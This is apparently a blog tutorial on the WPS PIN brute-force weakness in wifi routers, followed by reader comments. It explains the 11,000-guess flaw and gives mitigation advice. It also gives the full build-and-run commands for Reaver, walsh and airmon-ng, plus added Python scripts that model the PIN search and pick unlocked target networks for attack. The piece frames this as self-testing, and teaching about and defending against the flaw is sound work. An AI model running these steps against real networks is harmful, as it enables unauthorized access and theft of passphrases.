
By now we should all be aware of the dangers of securing networks with WEP; I demonstrated before how you can crack it in five minutes (see How to Crack Your Own WEP Network to Find Out Just How Insecure It Really Is). The advice has always been to use WPA or WPA2 to secure your network, with a long passphrase that can't be found by brute force.

Well, it turns out there’s a significant backdoor in most routers that can be exploited – in the form of a technology called WPS. Read on to find out how the hack works, how to test your own network, and what you can do to prevent it.


WPA itself is quite secure. The passphrase can only be recovered by brute-forcing a captured handshake offline, so it's only realistically crackable if you've chosen a weak, single-word passphrase.

WPS, on the other hand, is a technology built into most wifi routers that lets a device join without typing the WPA passphrase, either by entering the PIN printed on the side of the router or by pressing a button on both devices to pair them.

It turns out that the WPS PIN, a measly 8-digit numeric code, is very much vulnerable to brute force. Worse, the protocol leaks information as you guess: the router reports whether the first four digits are correct separately from the rest, and the eighth digit is just a checksum of the other seven, so an attacker needs at most 10,000 + 1,000 = 11,000 guesses rather than 100 million. Assuming a susceptible router and a good signal, the WPS PIN can be recovered in as little as 2 hours, and once the PIN is obtained the router hands over the WPA passphrase.
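As an added example (not code from the original article, from Reaver or from Viehböck's tool), here is a small Python model of why the search collapses to 11,000 guesses and what a lockout does to the time needed: the checksum calculation, a toy registrar that leaks the same NACK-after-M4 / NACK-after-M6 signal a real router does, the split search against it, and a rough worst-case time estimate. The `Registrar` model, the per-attempt timing and the lockout policy are my assumptions for illustration; real vendor behaviour varies.

```python
"""Added example, not code from the original article, from Reaver or from
Viehboeck's tool: why the WPS PIN search collapses to at most 11,000 guesses,
and what a lockout does to the worst-case time.  The Registrar model, the
per-attempt timing and the lockout policy are assumptions for illustration."""

MAX_FIRST_HALF = 10_000   # digits 1-4: the router confirms these on their own
MAX_SECOND_HALF = 1_000   # digits 5-7: guessed; digit 8 is a checksum, not secret


def wps_checksum(body: int) -> int:
    """Checksum digit for a 7-digit PIN body (the WPS spec's algorithm)."""
    accum = 0
    n = body
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True when an 8-digit PIN carries the correct checksum digit."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def make_pin(body: int) -> str:
    """Append the checksum to a 7-digit body, zero-padded."""
    return f"{body:07d}{wps_checksum(body)}"


class Registrar:
    """Toy model of the router side of the exchange (assumption: it follows the
    protocol as analysed, with no lockout).  It leaks what a real registrar leaks:
    a NACK after M4 means digits 1-4 were wrong; a NACK after M6 means digits 5-7
    were wrong; otherwise M7 follows, carrying the WPA passphrase."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("registrar PIN must carry a valid checksum")
        self.first = int(pin[:4])
        self.second = int(pin[4:7])
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if int(pin[:4]) != self.first:
            return "M4_NACK"
        if int(pin[4:7]) != self.second:
            return "M6_NACK"
        return "M7"


def recover_pin(reg: Registrar) -> str:
    """Split search: settle digits 1-4 first, then digits 5-7."""
    first = None
    for f in range(MAX_FIRST_HALF):
        # digits 5-7 are irrelevant at this stage; only the M4 verdict matters
        if reg.try_pin(make_pin(f * 1000)) != "M4_NACK":
            first = f
            break
    if first is None:
        raise RuntimeError("no first half accepted; router not behaving as modelled")
    for s in range(MAX_SECOND_HALF):
        pin = make_pin(first * 1000 + s)
        if reg.try_pin(pin) == "M7":
            return pin
    raise RuntimeError("no second half accepted")


def worst_case_attempts() -> int:
    """11,000 guesses instead of the 10**8 an 8-digit PIN suggests."""
    return MAX_FIRST_HALF + MAX_SECOND_HALF


def worst_case_seconds(seconds_per_attempt: float, lock_after: int = 0,
                       lock_seconds: float = 0.0) -> float:
    """Worst-case wall-clock time.  lock_after > 0 models a router that refuses
    WPS for lock_seconds after every lock_after failures (assumed policy; real
    vendor behaviour varies, and waiting it out is what --ignore-locks does)."""
    attempts = worst_case_attempts()
    locks = attempts // lock_after if lock_after else 0
    return attempts * seconds_per_attempt + locks * lock_seconds


if __name__ == "__main__":
    reg = Registrar("12345670")          # a well-known valid PIN (checksum digit 0)
    print(recover_pin(reg), "found after", reg.attempts, "attempts")
    print("no lockout, 1 s/attempt:", worst_case_seconds(1.0) / 3600, "hours")
    print("5 min lock per 10 failures:",
          worst_case_seconds(1.0, lock_after=10, lock_seconds=300) / 86400, "days")
```

The point the model makes is that a lockout changes the cost linearly, not the keyspace: the attacker still needs at most 11,000 guesses, the router just makes each batch of them slower, which is why the article's Netgear lockout stretched the attack into a day rather than stopping it.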


Reaver, released by Craig Heffner and available to download on Google Code, is a practical implementation that you can point and shoot at viable networks. Here’s a video of it in action (skip to the end if you want to just see the entire passphrase revealed to the attacker):

Stefan Viehböck also discovered the same vulnerability independently and has released a similar tool which you can download. Here’s a video of Stefan’s app in action:

Mitigating the Attack

There are a few methods of mitigating the attack. The first is to completely disable WPS on your router. Unfortunately, this isn't possible on every router, and WPS is usually enabled by default, so non-tech-savvy users are susceptible here.

Not only that, but I found that on my router the option to DISABLE WPS PIN didn't actually disable the PIN that is written on the side of the router, only the user-defined PIN. I quote:

When it’s disabled, users still can add a wireless client through WPS with either Push Button or PIN Number method.

So in some cases, it seems this is a permanent backdoor that cannot be mitigated by user settings alone.

A second option is to disable the wireless network entirely on susceptible devices, though obviously this isn’t going to be a viable option for most users who need the wifi functionality for laptops and mobile devices.

Advanced users among you may be thinking at this point about MAC address filtering to set up a list of specific devices allowed to join the network – but this can be easily circumvented by faking the MAC address of an allowed device.

Finally, devices can initiate a lockout when successive failed attempts are detected. This does not completely mitigate an attack, but it does significantly increase the time needed to complete it. I believe Netgear routers have an automatic 5 minute block built in, but in my testing this only increased the attack time required to about a day at most.

A firmware update could increase the time for which devices are blocked, multiplying the total time needed for an attack, but this would need to be either user-initiated (unlikely for most users) or performed automatically when the router restarts (as is often the case with cable services).

Try It Yourself

For those who wish to test their own home setups for the vulnerability, you can obtain the latest code from the Reaver project on Google Code. You'll need some flavour of Linux to run it on (I suggest Backtrack), a wifi card and driver that support monitor mode, and the aircrack-ng suite (which provides airmon-ng). If you were able to follow my last tutorial on WEP cracking (How to Crack Your Own WEP Network to Find Out Just How Insecure It Really Is), this will work too.

After downloading the package, extract it, build it as root, and put your wifi card into monitor mode (replacing XXXX with the current version number, or remember you can press TAB to have the console auto-complete the filename for you):

tar -xvf reaver-XXXX.tar.gz 
cd reaver-XXXX/src
./configure
make
make install
airmon-ng start wlan0

You should see something about a mon0 interface being created. To scan for networks that advertise WPS, use (walsh was renamed wash in later Reaver releases, so try that name if walsh isn't found):

walsh -i mon0

and to begin the reaver attack, type (replacing BSSID with the hexadecimal BSSID of the target network):

reaver -i mon0 -b BSSID -vv -d 0 --ignore-locks
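Choosing which network to point reaver at is the step most people get wrong, so here is an added example (not part of the original article or of the Reaver project) that reads walsh/wash output and keeps only the networks worth trying: WPS advertised, not reporting itself as locked, and a signal strong enough that the WPS handshake can actually complete. The sample output is constructed to match the wash 1.4 table layout, which is an assumption (the exact columns differ between versions), and the `-70` dBm threshold is a rule of thumb, not a measured limit.

```python
"""Added example, not code from the original article or from Reaver: pick
viable targets out of walsh/wash output.  SAMPLE_WASH_OUTPUT is constructed
(assumption: wash 1.4 column layout); the RSSI cut-off is a rule of thumb."""

import re
from dataclasses import dataclass
from typing import List

# Constructed sample, laid out like `wash -i mon0` prints its table.
SAMPLE_WASH_OUTPUT = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -47        1.0               No                HomeNet-Test
22:33:44:55:66:77       9            -60        1.0               No                Coffee Shop Guest
66:77:88:99:AA:BB       1            -82        1.0               No                FarAway
CC:DD:EE:FF:00:11      11            -51        1.0               Yes               LockedRouter
"""

MAC_RE = re.compile(r"([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}")


@dataclass
class WpsTarget:
    bssid: str
    channel: int
    rssi: int        # dBm, closer to 0 is stronger
    version: str
    locked: bool     # what the AP *claims*; some lie or stay stuck
    essid: str


def parse_wash(text: str) -> List[WpsTarget]:
    """Parse the wash table.  Header, separator and blank lines are skipped by
    requiring the first field to be a MAC address; the ESSID is everything after
    the fifth column so names with spaces survive."""
    targets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or not MAC_RE.fullmatch(parts[0]):
            continue
        bssid, channel, rssi, version, locked = parts[:5]
        essid = " ".join(parts[5:])
        targets.append(WpsTarget(bssid.upper(), int(channel), int(rssi),
                                 version, locked.lower() == "yes", essid))
    return targets


def viable_targets(targets: List[WpsTarget], min_rssi: int = -70) -> List[WpsTarget]:
    """Unlocked APs with a signal strong enough to complete the handshake,
    strongest first.  Weak signal is the most common reason reaver stalls."""
    return sorted((t for t in targets if not t.locked and t.rssi >= min_rssi),
                  key=lambda t: -t.rssi)


def reaver_command(t: WpsTarget, iface: str = "mon0") -> List[str]:
    """The article's reaver invocation as an argv list (no shell quoting issues),
    with -c pinning the channel so reaver doesn't have to hunt for it."""
    return ["reaver", "-i", iface, "-b", t.bssid, "-c", str(t.channel),
            "-vv", "-d", "0", "--ignore-locks"]


if __name__ == "__main__":
    for t in viable_targets(parse_wash(SAMPLE_WASH_OUTPUT)):
        print(f"{t.rssi:4d} dBm  ch{t.channel:2d}  {t.essid!r}")
        print("   ", " ".join(reaver_command(t)))
```

Treat the "WPS Locked" column as advisory only: it is what the access point reports in its beacons, and the lockout the article ran into is exactly the case where an AP that answered "No" a minute ago starts refusing for five minutes. That is what `--ignore-locks` in the reaver line above is for; it keeps trying through the lock rather than giving up.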

It goes without saying that running this against any network you don't have explicit permission to test is a criminal offence under computer misuse laws in most jurisdictions.


Be sure to check out the Reaver wiki for a fuller FAQ. The most common problem I found was either too weak a signal, meaning a full WPS handshake could never be completed, or the same PIN being repeated along with a timeout; this was due to the router's 5 minute lockout.

I left the software running though, and after some time it would try some more PINs, until my home network was broken in under 8 hours, and the 20-character alphanumeric, mixed-punctuation passphrase I had diligently set was revealed onscreen.

Should You Be Worried?

This is still very much a new attack, but it’s important you’re aware of the dangers and know how to protect yourself. If you find your router is vulnerable, and have a support number to call, I would suggest you ask them how long it will be until a suitable firmware update is available, or how you can go about the upgrade process if it is available already.

Some users will be able to easily prevent this attack with a simple setting alteration, but for the vast number of routers in use this is a permanent backdoor which only a firmware update can partially mitigate.

Let us know in the comments if you have any questions or managed to try this on your own wifi.

  1. John Lee
    December 24, 2016 at 8:22 am

    I am in a feud with my property manager in a condo complex. We have a gated community and fobs to get in the doors and gates. So they can always tell when I'm leaving or coming back (not to mention perimeter alarms), but that's another story. All the floors go through my bottom-floor wall where there is an access panel. I have noticed some weird wiring in the panel (a blank faceplate is all); it has resistors on two of the 4 loops, or sets of pairs if you will. Is this normal for data wiring between routers and/or gateways? Any help is appreciated.

  2. tom
    March 14, 2015 at 10:30 pm

    Doesn't work well anymore. Most routers lock after 3 bad PIN attempts. I had a Netgear I tried this on and had no luck with it. However, I tried it on a Motorola SBG 6580 and it got the PIN, but it took 6 hours and I was 5 feet from the router.
    There are several other tools which have been released that work similarly; Bully and wpspin with Kali Linux come to mind, but Reaver works the best if you use the options.
    It is basically hit or miss, but I have found these tools only get results on about 1 or 2 out of 10 routers.

  3. Joseph Zajdler
    May 27, 2012 at 4:21 pm

    Wait a minute. Has anyone tried this? Even if you take 2-10 hours to find my 8-digit PIN, what's next? Are you going to camp outside my house for months until I press the button on my router?

    • muotechguy
      May 27, 2012 at 4:34 pm

      Not necessary. All the attacker needs is that 8 digit PIN. Yes, I tried.

  4. Oliver @ VPS Hosting
    January 25, 2012 at 1:17 am

    How interesting it is. I have a close friend just near my house who has Wi-Fi that is not quite secure. He did not even put a password on it, and its WPS is enabled.

  5. Fried Rice
    January 19, 2012 at 6:10 pm

    set your connection to be hidden. problem solved...?

    • James Bruce
      January 19, 2012 at 7:06 pm

      Nope. Hidden is only hidden from the Windows and Mac wifi list. Airodump will find them all. The attack uses the BSSID, not the ESSID (which is what is hidden).

  6. Anthony Boone
    January 15, 2012 at 1:18 am

    Awesome article. Super informative. Thank you for the how-to, as well!

  7. Anonymous
    January 10, 2012 at 4:13 pm

    Holy crap! My dad had recently bought a Samsung printer which advertised one click wireless setup using WPS. I had never heard of it before, but to be honest I did wonder how they did that and I smelt something fishy. Luckily, it never did work, so I guess we don't have WPS, but I will have to check that. Thanks a lot for this article, could have saved me from a malicious attack.

    • James Bruce
      January 11, 2012 at 9:04 am

      Definitely check that out. Even if the button doesn't work (I could never get my printer to work like that either, gave up and used an ethernet cable instead), the WPS PIN may still be enabled (and unable to be disabled). If you have a suitable wifi card, download Backtrack and try for yourself; that's the only reliable way to check really. Good luck!

  8. kD DeShane
    January 7, 2012 at 5:27 am

    Thanks for the article. I recently got into an argument about password sensitivity/security on a family member's router. Obviously, I am horrible at explaining the whys and hows because her reply was "Who in this neighborhood knows I have a son/daughter named xxxxxxx?" Perfect article to send to such relatives who can't seem to understand the importance of basic password security on not just banking websites, but nowadays, on the hardware itself!

    • James Bruce
      January 7, 2012 at 9:24 am

      Lol. I would direct them toward this site to test their password choice, which explains how long it would take to brute force it:

  9. Asa
    January 6, 2012 at 9:31 pm

    It's been years since I bought a router,.. I didn't realize they had a PIN number connection method.  Wouldn't the repercussions of this be obvious to the designers???  Shameful.  Another issue I have noticed in modern routers is a PNP configuration feature (it may be called something else), where recent version of Windows (and possibly Mac/Linux) will detect that the router has not been configured yet, and bring up the config page where you can set your passphrase, etc.  I have noticed routers that were never configured (the owners may be using older OS versions or just don't know what to do when the prompt comes up so cancel or ignore it).  There has got to be a better solution to help the less technically inclined have (somewhat) secure networks.

    • James Bruce
      January 7, 2012 at 9:29 am

      Hmm, I haven't come across that, but I don't configure many routers to be honest. 

      It was incredibly irresponsible of someone to put PINs on routers, indeed. I really can't understand the logic of setting up an elaborate password, then making 8 numbers to completely bypass it. I believe this was actually defined in the various wifi standards documents though, rather than router manufacturers themselves. 

  10. Joel Lee
    January 6, 2012 at 8:48 pm

    It's interesting to me that it took this long to exploit what seems to be an incredibly simple vulnerability.

    I don't have much experience with wireless hardware, so maybe this is a dumb question: would it be possible to mitigate the attack by disabling the SSID broadcast? If the hacker doesn't know your network exists, they can't hack it, right? Or can they sniff it out somehow?

    • James Bruce
      January 6, 2012 at 9:19 pm

      Very easy to detect I'm afraid, the BSSID is still broadcast, and that's all that's needed for this or any hacks. SSID hiding really only mitigates against people seeing the network in simple windows/Mac wifi scan.

      You're right, it is odd it's taken so long to discover this - and then two people discover it at exactly the same time!

  11. Anonymous
    January 6, 2012 at 8:10 pm

    Great Article :)
